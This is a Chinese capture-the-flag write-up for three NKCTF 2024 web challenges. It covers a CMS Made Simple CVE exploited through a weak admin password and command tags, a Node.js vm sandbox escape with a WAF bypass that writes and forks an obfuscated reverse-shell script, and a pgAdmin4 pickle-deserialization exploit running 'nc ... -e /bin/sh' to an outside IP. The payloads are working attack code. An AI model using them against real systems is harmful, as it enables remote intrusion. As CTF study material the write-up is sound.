【Web】NKCTF 2024 个人wp(部分)

目录

my first cms

全世界最简单的CTF

attack_tacooooo 

---

属实太菜了，3/4

my first cms

一眼搜版本2.2.19

CVE -CVE-2024-27622

 GitHub - capture0x/CMSMadeSimple

访问/admin/login.php

爆出弱口令，后台登录

admin Admin123

Extensions > User Defined Tags -> Add User Defined Tag，写入恶意命令

 点击Run执行拿到flag

全世界最简单的CTF

首先访问/secret得到源码

const express = require('express');
const bodyParser = require('body-parser');
const app = express();
const fs = require("fs");
const path = require('path');
const vm = require("vm");app
.use(bodyParser.json())
.set('views', path.join(__dirname, 'views'))
.use(express.static(path.join(__dirname, '/public')))app.get('/', function (req, res){res.sendFile(__dirname + '/public/home.html');
})function waf(code) {let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g;if(code.match(pattern)){throw new Error("what can I say? hacker out!!");}
}app.post('/', function (req, res){let code = req.body.code;let sandbox = Object.create(null);let context = vm.createContext(sandbox);try {waf(code)let result = vm.runInContext(code, context);console.log(result);} catch (e){console.log(e.message);require('./hack');}
})app.get('/secret', function (req, res){if(process.__filename == null) {let content = fs.readFileSync(__filename, "utf-8");return res.send(content);} else {let content = fs.readFileSync(process.__filename, "utf-8");return res.send(content);}
})app.listen(3000, ()=>{console.log("listen on 3000");
})

这一段就是要打vm2沙箱逃逸了，原理：NodeJS VM沙箱逃逸-CSDN博客  

app.post('/', function (req, res){
        let code = req.body.code;
        let sandbox = Object.create(null);
        let context = vm.createContext(sandbox);
        try {
            waf(code)
            let result = vm.runInContext(code, context);
            console.log(result);
        } catch (e){
            console.log(e.message);
            require('./hack');
        }
})

这题如果没有过滤，exp应该这样写  

throw new Proxy({}, {
     get: function(){
         const c = arguments.callee.caller;
         const p = (c.constructor.constructor('return process'))();
         return p.mainModule.require('child_process').execSync('whoami').toString();
    }
})

题目的waf是

let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g; 

把过滤掉的关键字都换成这种模板文字，process可以用下面方法

(`${`${`child_proces`}s`}`)
.execSync转成[`${`${`exe`}cSync`}`]  

但是中括号 [ ]被waf了，所以想到child_process下面有5个函数，只剩下fork函数了

那么思路就是在上面payload基础上，通过fs进行文件写文件，然后用fork进行加载

为了逃逸waf，可以逆序内容，然后再反序过来，写入文件后再调用fork加载达到反弹shell

throw new Proxy({}, {get: function(){const content = `;)"'}i-,hsab{|}d-,46esab{|}d-,46esab{|}9UkaKtSQEl0MNpXT4hTeNpHNp5keFpGT5lkaNVXUq1Ee4M0YqJ1MMJjVHpldBlmSrE0UhRXQDFmeG1WW,ohce{' c- hsab"(cexe;)"ssecorp_dlihc"(eriuqer = } cexe { tsnoc`;const reversedContent = content.split('').reverse().join('');	const c = arguments.callee.caller;const p = (c.constructor.constructor(`${`${`return proces`}s`}`))();p.mainModule.require('fs').writeFileSync('/tmp/test1.js', reversedContent);return p.mainModule.require(`${`${`child_proces`}s`}`).fork('/tmp/test1.js').toString();}
})

监听端口，成功反弹shell 

attack_tacooooo 

开搜pgAdmin4CVE

【漏洞通告】pgAdmin4反序列化代码执行漏洞（CVE-2024-2044）-启明星辰

Shielder - pgAdmin (<=8.3) Path Traversal in Session Handling Leads to Unsafe Deserialization and Remote Code Execution (RCE)

根据题目提示，tacooooo@qq.com，tacooooo 登录

exp.py(题目环境没有curl和bash命令，所以用nc反弹)

import os
import pickleclass exp(object):def __reduce__(self):s = """nc 124.222.136.33 1337 -e /bin/sh"""return os.system, (s,)
e = exp()
with open("./posix.pickle", "wb") as f:pickle.dump(e, f)

访问Storage Manager 

上传 posix.pickle 

 拿到上传文件的路径

包改 pga4_session=/var/lib/pgadmin/storage/tacooooo_qq.com/posix.pickle!a  

随便访问一个页面，成功执行命令，下略